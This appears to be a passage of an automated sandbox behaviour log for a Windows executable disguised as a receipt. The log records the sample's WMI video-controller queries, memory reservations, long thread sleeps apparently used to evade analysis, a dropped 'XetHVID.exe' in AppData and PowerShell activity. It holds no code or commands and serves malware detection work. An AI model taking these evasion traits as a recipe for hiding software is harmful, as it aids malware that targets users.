            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeMemory allocated: A20000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeMemory allocated: 2520000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeMemory allocated: 2340000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeMemory allocated: 8C70000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeMemory allocated: 9C70000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeMemory allocated: 9E90000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeMemory allocated: AE90000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeMemory allocated: 1390000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeMemory allocated: 2EE0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeMemory allocated: 2DE0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeMemory allocated: 1350000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeMemory allocated: 2B30000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeMemory allocated: 4B30000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeMemory allocated: 8E00000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeMemory allocated: 9E00000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeMemory allocated: A010000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeMemory allocated: B010000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeMemory allocated: 2A00000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeMemory allocated: 2A30000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeMemory allocated: 4A30000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 240000Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 239875Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 239765Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 239612Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 239485Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 239375Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 239196Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 239093Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 238985Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 238875Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 238766Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 238618Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 238507Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 238391Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 238265Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 238156Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 238031Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 237904Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 237780Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 240000
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 239844
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 239734
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 239625
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 239516
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 239406
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 239297
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 239188
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 239063
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 238953
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 238844
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 238718
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 238569
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 238448
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 237764
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 237655
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWindow / User API: threadDelayed 1324Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWindow / User API: threadDelayed 1319Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4808Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 707Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4360Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 434Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWindow / User API: threadDelayed 3642Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWindow / User API: threadDelayed 6167Jump to behavior
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeWindow / User API: threadDelayed 537
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeWindow / User API: threadDelayed 2131
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe TID: 7588Thread sleep time: -11068046444225724s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe TID: 7588Thread sleep time: -240000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe TID: 7588Thread sleep time: -239875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe TID: 7588Thread sleep time: -239765s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe TID: 7588Thread sleep time: -239612s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe TID: 7588Thread sleep time: -239485s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe TID: 7588Thread sleep time: -239375s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe TID: 7588Thread sleep time: -239196s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe TID: 7588Thread sleep time: -239093s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe TID: 7588Thread sleep time: -238985s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe TID: 7588Thread sleep time: -238875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe TID: 7588Thread sleep time: -238766s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe TID: 7588Thread sleep time: -238618s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe TID: 7588Thread sleep time: -238507s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe TID: 7588Thread sleep time: -238391s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe TID: 7588Thread sleep time: -238265s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe TID: 7588Thread sleep time: -238156s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe TID: 7588Thread sleep time: -238031s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe TID: 7588Thread sleep time: -237904s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe TID: 7588Thread sleep time: -237780s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe TID: 7572Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7876Thread sleep count: 4808 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7880Thread sleep count: 707 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8048Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7992Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8052Thread sleep time: -3689348814741908s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8016Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe TID: 7472Thread sleep time: -16602069666338586s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe TID: 7276Thread sleep time: -10145709240540247s >= -30000s
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe TID: 7276Thread sleep time: -240000s >= -30000s
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe TID: 7276Thread sleep time: -239844s >= -30000s
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe TID: 7276Thread sleep time: -239734s >= -30000s
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe TID: 7276Thread sleep time: -239625s >= -30000s
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe TID: 7276Thread sleep time: -239516s >= -30000s
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe TID: 7276Thread sleep time: -239406s >= -30000s
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe TID: 7276Thread sleep time: -239297s >= -30000s
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe TID: 7276Thread sleep time: -239188s >= -30000s
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe TID: 7276Thread sleep time: -239063s >= -30000s
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe TID: 7276Thread sleep time: -238953s >= -30000s
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe TID: 7276Thread sleep time: -238844s >= -30000s
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe TID: 7276Thread sleep time: -238718s >= -30000s
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe TID: 7276Thread sleep time: -238569s >= -30000s
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe TID: 7276Thread sleep time: -238448s >= -30000s
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe TID: 7276Thread sleep time: -237764s >= -30000s
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe TID: 7276Thread sleep time: -237655s >= -30000s
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe TID: 7288Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\XetHVID.exe TID: 3180Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 240000Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 239875Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 239765Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 239612Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 239485Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 239375Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 239196Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 239093Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 238985Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 238875Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 238766Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 238618Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 238507Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 238391Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 238265Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 238156Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 238031Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 237904Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 237780Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 240000
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 239844
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 239734
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 239625
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 239516
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 239406
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 239297
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 239188
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 239063
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeThread delayed: delay time: 238953
